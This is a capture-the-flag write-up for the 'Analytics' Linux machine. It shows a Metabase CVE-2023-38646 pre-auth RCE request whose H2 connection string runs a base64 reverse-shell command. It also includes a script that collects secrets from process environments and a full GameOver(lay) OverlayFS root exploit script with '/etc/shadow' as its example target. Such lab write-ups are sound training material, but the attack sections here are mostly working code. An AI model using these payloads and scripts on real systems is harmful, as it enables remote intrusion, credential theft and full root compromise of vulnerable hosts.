Analytics


Machine: Linux

Level: Easy

Nmap

└─# nmap -p- --min-rate 10000 10.10.11.233
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

└─# nmap -p 80 -sCV 10.10.11.233
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://analytical.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

User Access

CVE Exploitation

The Login link on analytical.htb redirects to a Metabase instance at data.analytical.htb. It is affected by CVE-2023-38646 (pre-authentication remote code execution), which xpoc confirms:

└─# ./xpoc_linux_amd64 -r 403 -t http://data.analytical.htb/
  __  /\    /\_.  ___.  _____
  | |/ /   / __.\/ __.\/ ____|
  |   /XRAY™/_/ / / / / /          
 / . |   / .___/ /_/ / /___.     
/ /|_|  / /    \____/\____/ 
\/v0.0.8\/cloud plugins: [410]
[INFO] 2023-10-08 02:49:03 use config at: /root/.xray/xpoc-config.yaml [strategy.go:30]
[INFO] 2023-10-08 02:49:03 load plugins form: [/root/.xray/xpoc/plugins] [loader.go:126]
[INFO] 2023-10-08 02:49:03 load plugins form: [/root/.xray/xpoc/plugins/metabase-setup-validate-rce.yml.bin] [loader.go:126]
[INFO] 2023-10-08 02:49:04 [1] Website:  [200 OK] http://data.analytical.htb/
[INFO] 2023-10-08 02:49:05 [1] Vulnerability: poc-yaml-metabase-setup-validate-rce
                           ├── target : http://data.analytical.htb/
                           ╰── links  : https://stack.chaitin.com/techblog/detail?id=140    

The flaw is that /api/session/properties returns the setup-token to unauthenticated clients even after initial setup, and /api/setup/validate accepts an arbitrary H2 connection string as long as that token is supplied. Fetch the setup-token from /api/session/properties, then POST the body below to /api/setup/validate; the connection string smuggles a CREATE TRIGGER whose JavaScript source H2 compiles and runs, so the command executes as the user Metabase runs as. Start a listener on the attacking machine first; REVERSE SHELL in the payload is a placeholder for the base64-encoded reverse-shell command.

{
    "token": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,REVERSE SHELL}|{base64,-d}|{bash,-i}')\n$$--=x",
            "advanced-options": false,
            "ssl": true
        },
        "name": "test",
        "engine": "h2"
    }
}

Get User Account

Checking the environment shows we are inside a Docker container (note /.dockerenv):

/ $ ls -al /
total 92
drwxr-xr-x    1 root     root          4096 Oct  8 08:36 .
drwxr-xr-x    1 root     root          4096 Oct  8 08:36 ..
-rwxr-xr-x    1 root     root             0 Oct  8 08:36 .dockerenv
...

I first assumed this would be a Docker escape, but hardly any commands work in this stripped-down container. Given the box's difficulty I suspected credentials stored in a file, but uploaded linpeas anyway to have a look, and its environment check turned up a username and password (META_USER and META_PASS below):

╔══════════╣ Environment
╚ Any private information inside environment variables?     
HISTFILESIZE=0                                                                                                      
MB_LDAP_BIND_DN=
LANGUAGE=en_US:en
USER=metabase
HOSTNAME=3654f44bdfa3
FC_LANG=en-US
SHLVL=5
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../lib
HOME=/home/metabase
OLDPWD=/
MB_EMAIL_SMTP_PASSWORD=
LC_CTYPE=en_US.UTF-8
JAVA_VERSION=jdk-11.0.19+7
LOGNAME=metabase
_=linpeas.sh
MB_DB_CONNECTION_URI=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_PASS=
MB_JETTY_HOST=0.0.0.0
META_PASS=[deleted]
LANG=en_US.UTF-8
MB_LDAP_PASSWORD=
HISTSIZE=0
SHELL=/bin/sh
MB_EMAIL_SMTP_USERNAME=
MB_DB_USER=
META_USER=[deleted]
LC_ALL=en_US.UTF-8
JAVA_HOME=/opt/java/openjdk
PWD=/tmp
HISTFILE=/dev/null
MB_DB_FILE=//metabase.db/metabase.db
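The same Environment check without linpeas, as an added example that is not part of the writeup: in a container like this one, where most tools are missing, the environment of every process you own is readable from /proc/<pid>/environ, and Metabase's MB_* variables are exported even when blank, so the filter only reports non-empty values. The name pattern is an assumption about what credential variables are usually called.

```shell
#!/bin/sh
# Added example (not from the writeup): find credential-looking environment variables
# using only POSIX sh, grep, tr and sed, which a busybox-based container still has.

# Read NAME=VALUE lines on stdin and keep those whose name looks credential-bearing
# and whose value is non-empty (MB_DB_PASS= with nothing after it is skipped).
# Plain USER/LOGNAME are deliberately not matched; *_USER and USER_* are, so that the
# username half of a pair such as META_USER / META_PASS is reported too.
find_secret_vars() {
    grep -E '^[A-Za-z0-9_]*(PASS|PASSWD|PASSWORD|SECRET|TOKEN|KEY|CRED|AUTH|_USER|USER_)[A-Za-z0-9_]*=.+$'
}

# Walk /proc/<pid>/environ for every process whose environment we may read.
# environ is NUL-separated, so it is converted to one variable per line first.
scan_proc_environ() {
    for f in /proc/[0-9]*/environ; do
        [ -r "$f" ] || continue
        tr '\0' '\n' < "$f" 2>/dev/null | find_secret_vars | sed "s|^|$f: |"
    done
}

# Run with `sh find_secrets.sh scan`: current shell environment first, then /proc.
if [ "${1:-}" = scan ]; then
    env | find_secret_vars
    scan_proc_environ
fi
```

Checking /proc/1/environ matters in containers: PID 1 is the service entry point, and variables injected by the orchestrator are visible there even when the shell you landed in was started with a trimmed environment.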

Root Access

Enumerating the host shows Ubuntu 22.04 LTS (Jammy) running the HWE kernel 6.2.0-25-generic, which is affected by CVE-2023-2640 (GameOver(lay), together with its companion CVE-2023-32629). The bug is in Ubuntu's own OverlayFS patches, so the Ubuntu package build matters rather than the upstream version, and the public PoC needs unprivileged user namespaces, which Ubuntu allows by default:

                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
                              ╚════════════════════╝ 
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits                                  
Linux version 6.2.0-25-generic (buildd@lcy02-amd64-044) (x86_64-linux-gnu-gcc-11 (Ubuntu 11.3.0-1ubuntu1~22.04.1) 11.3.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2
Distributor ID: Ubuntu
Description:    Ubuntu 22.04.3 LTS
Release:        22.04
Codename:       jammy

In practice, running the PoC to read the relevant files as root is enough; you can also have it launch a reverse shell for a cleaner root session.
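The public GameOver(lay) PoC for the CVE named above, packaged as a script with a precondition check. This is an added example and not the writeup's own command; the path /usr/bin/python3 for the binary to copy and the `run_poc` wrapper are assumptions. Inside a user namespace, `setcap` may write a file capability to a file in the overlay lowerdir; the Ubuntu bug is that the copy-up performed by `touch` carries that capability into the upper directory unchanged, where the host namespace honours it, so the copied python3 can call setuid(0) once it is executed outside the namespace.

```shell
#!/bin/bash
# Added example (not from the writeup): GameOver(lay), CVE-2023-2640 / CVE-2023-32629.
# /usr/bin/python3 is an assumed path; any binary that can call setuid() would do.

# The command run inside `unshare -rm` (new user + mount namespace). $1 = work directory.
build_ns_command() {
    local d="$1"
    echo "mkdir -p $d/l $d/u $d/w $d/m && cp /usr/bin/python3 $d/l/ && setcap cap_setuid+eip $d/l/python3 && mount -t overlay overlay -o rw,lowerdir=$d/l,upperdir=$d/u,workdir=$d/w $d/m && touch $d/m/python3"
}

# `unshare -rm` fails before anything else if unprivileged user namespaces are disabled.
# Ubuntu exposes kernel.unprivileged_userns_clone; 1, or the sysctl being absent, means allowed.
userns_allowed() {
    local v
    v=$(cat /proc/sys/kernel/unprivileged_userns_clone 2>/dev/null || echo 1)
    [ "$v" = 1 ]
}

# Stage the capability-carrying copy, then run it outside the namespace. $1 = command to
# run as root (default: id). The copied-up file lives in the upper directory.
run_poc() {
    local d cmd
    userns_allowed || { echo "unprivileged user namespaces disabled" >&2; return 1; }
    d=$(mktemp -d)
    cmd=$(build_ns_command "$d")
    unshare -rm sh -c "$cmd" || { echo "staging failed (patched kernel, or no overlay support)" >&2; return 1; }
    "$d/u/python3" -c "import os; os.setuid(0); os.system('${1:-id}')"
}

# Usage: ./gameoverlay.sh run 'cat /etc/shadow'
if [ "${1:-}" = run ]; then
    run_poc "${2:-id}"
fi
```

On a patched kernel the staging step still succeeds but the copied-up file loses its capability, so `os.setuid(0)` raises PermissionError; that is the quickest way to tell a vulnerable build from a fixed one without trusting the version string.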